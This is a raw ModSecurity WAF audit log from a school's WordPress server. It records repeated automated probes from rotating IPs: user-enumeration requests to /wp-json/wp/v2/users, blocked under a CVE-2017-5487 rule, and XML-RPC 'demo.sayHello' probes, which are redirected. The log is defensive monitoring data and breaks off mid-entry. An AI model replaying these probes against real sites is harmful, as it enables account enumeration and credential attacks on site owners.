Action: Intercepted (phase 2) Stopwatch: 1746465811500505 2569 (- - -) Stopwatch2: 1746465811500505 2569; combined=1247, p1=398, p2=819, p3=0, p4=0, p5=29, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44033916-Z-- --9286e618-A-- [06/May/2025:00:23:34 +0700] aBj0FgRwKNFSM6B7_LapCQAAAIU 103.236.140.4 57664 103.236.140.4 8181 --9286e618-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.149 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9286e618-C-- demo.sayHello --9286e618-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9286e618-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465814957347 5950 (- - -) Stopwatch2: 1746465814957347 5950; combined=4430, p1=546, p2=3652, p3=32, p4=35, p5=97, sr=73, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9286e618-Z-- --5e678411-A-- [06/May/2025:00:24:53 +0700] aBj0ZfZJDMuQndL03JNnxgAAAFE 103.236.140.4 58330 103.236.140.4 8181 --5e678411-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5e678411-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e678411-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465893279668 2753 (- - -) Stopwatch2: 1746465893279668 2753; combined=1216, p1=416, p2=771, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e678411-Z-- --50005f56-A-- [06/May/2025:00:24:56 +0700] aBj0aARwKNFSM6B7_LapLAAAAJQ 103.236.140.4 58358 103.236.140.4 8181 --50005f56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --50005f56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50005f56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465896475677 2861 (- - -) Stopwatch2: 1746465896475677 2861; combined=1311, p1=409, p2=868, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50005f56-Z-- --9a4f9332-A-- [06/May/2025:00:24:56 +0700] aBj0aPZJDMuQndL03JNnyAAAAE4 103.236.140.4 58364 103.236.140.4 8181 --9a4f9332-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.220 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a4f9332-C-- demo.sayHello --9a4f9332-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a4f9332-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465896818151 4873 (- - -) Stopwatch2: 1746465896818151 4873; combined=3942, p1=513, p2=3202, p3=32, p4=34, p5=94, sr=68, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a4f9332-Z-- --e1d7c97e-A-- [06/May/2025:00:24:59 +0700] aBj0awRwKNFSM6B7_LapMQAAAIY 103.236.140.4 58390 103.236.140.4 8181 --e1d7c97e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.136 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e1d7c97e-C-- demo.sayHello --e1d7c97e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1d7c97e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465899378237 5917 (- - -) Stopwatch2: 1746465899378237 5917; combined=4392, p1=524, p2=3642, p3=32, p4=34, p5=94, sr=70, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1d7c97e-Z-- --d45f907a-A-- [06/May/2025:00:25:18 +0700] aBj0fvZJDMuQndL03JNn5AAAAEg 103.236.140.4 58554 103.236.140.4 8181 --d45f907a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d45f907a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d45f907a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465918667795 2749 (- - -) Stopwatch2: 1746465918667795 2749; combined=1234, p1=432, p2=762, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d45f907a-Z-- --d445c87e-A-- [06/May/2025:00:25:22 +0700] aBj0gvZJDMuQndL03JNn5gAAAE0 103.236.140.4 58586 103.236.140.4 8181 --d445c87e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.114 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d445c87e-C-- demo.sayHello --d445c87e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d445c87e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465922609761 5478 (- - -) Stopwatch2: 1746465922609761 5478; combined=4071, p1=530, p2=3328, p3=31, p4=34, p5=87, sr=73, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d445c87e-Z-- --54960028-A-- [06/May/2025:00:25:41 +0700] aBj0lfZJDMuQndL03JNoAAAAAE8 103.236.140.4 58760 103.236.140.4 8181 --54960028-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --54960028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54960028-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465941030307 2724 (- - -) Stopwatch2: 1746465941030307 2724; combined=1212, p1=409, p2=773, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54960028-Z-- --9d356c13-A-- [06/May/2025:00:25:44 +0700] aBj0mARwKNFSM6B7_LapNwAAAIo 103.236.140.4 58792 103.236.140.4 8181 --9d356c13-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9d356c13-C-- demo.sayHello --9d356c13-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d356c13-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465944535589 6062 (- - -) Stopwatch2: 1746465944535589 6062; combined=4369, p1=535, p2=3595, p3=42, p4=33, p5=97, sr=72, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d356c13-Z-- --61e25275-A-- [06/May/2025:00:26:20 +0700] aBj0vPZJDMuQndL03JNoKgAAAFY 103.236.140.4 59044 103.236.140.4 8181 --61e25275-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.113 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --61e25275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61e25275-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465980429660 2963 (- - -) Stopwatch2: 1746465980429660 2963; combined=1516, p1=478, p2=1002, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61e25275-Z-- --4d925b3f-A-- [06/May/2025:00:26:23 +0700] aBj0vwRwKNFSM6B7_LapOgAAAJc 103.236.140.4 59072 103.236.140.4 8181 --4d925b3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.113 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d925b3f-C-- demo.sayHello --4d925b3f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d925b3f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465983966464 6799 (- - -) Stopwatch2: 1746465983966464 6799; combined=4986, p1=654, p2=4082, p3=38, p4=42, p5=100, sr=76, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d925b3f-Z-- --4dc84b00-A-- [06/May/2025:00:26:35 +0700] aBj0y02V_h1VFAgsfgaI8AAAAAs 103.236.140.4 59194 103.236.140.4 8181 --4dc84b00-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4dc84b00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dc84b00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465995624320 2171 (- - -) Stopwatch2: 1746465995624320 2171; combined=1192, p1=389, p2=772, p3=0, p4=0, p5=31, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dc84b00-Z-- --c4ad692d-A-- [06/May/2025:00:26:40 +0700] aBj00E2V_h1VFAgsfgaI9gAAAAA 103.236.140.4 59230 103.236.140.4 8181 --c4ad692d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c4ad692d-C-- demo.sayHello --c4ad692d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4ad692d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746466000629611 6423 (- - -) Stopwatch2: 1746466000629611 6423; combined=4724, p1=597, p2=3891, p3=38, p4=43, p5=93, sr=74, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4ad692d-Z-- --4f40d428-A-- [06/May/2025:00:28:43 +0700] aBj1S4ZWvR7-42f6JrAW6wAAAMo 103.236.140.4 60242 103.236.140.4 8181 --4f40d428-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4f40d428-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f40d428-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746466123762471 2925 (- - -) Stopwatch2: 1746466123762471 2925; combined=1265, p1=412, p2=817, p3=0, p4=0, p5=35, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f40d428-Z-- --cb8b182e-A-- [06/May/2025:00:28:47 +0700] aBj1T4ZWvR7-42f6JrAW7QAAAM8 103.236.140.4 60286 103.236.140.4 8181 --cb8b182e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cb8b182e-C-- demo.sayHello --cb8b182e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb8b182e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746466127447953 5736 (- - -) Stopwatch2: 1746466127447953 5736; combined=4251, p1=541, p2=3429, p3=30, p4=31, p5=125, sr=91, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb8b182e-Z-- --8f94722e-A-- [06/May/2025:00:30:49 +0700] aBj1yU2V_h1VFAgsfgaJqwAAAA0 103.236.140.4 33042 103.236.140.4 8181 --8f94722e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8f94722e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f94722e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746466249700516 2575 (- - -) Stopwatch2: 1746466249700516 2575; combined=1149, p1=396, p2=724, p3=0, p4=0, p5=29, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f94722e-Z-- --391a246e-A-- [06/May/2025:00:30:54 +0700] aBj1zoZWvR7-42f6JrAXIQAAANQ 103.236.140.4 33078 103.236.140.4 8181 --391a246e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --391a246e-C-- demo.sayHello --391a246e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --391a246e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content 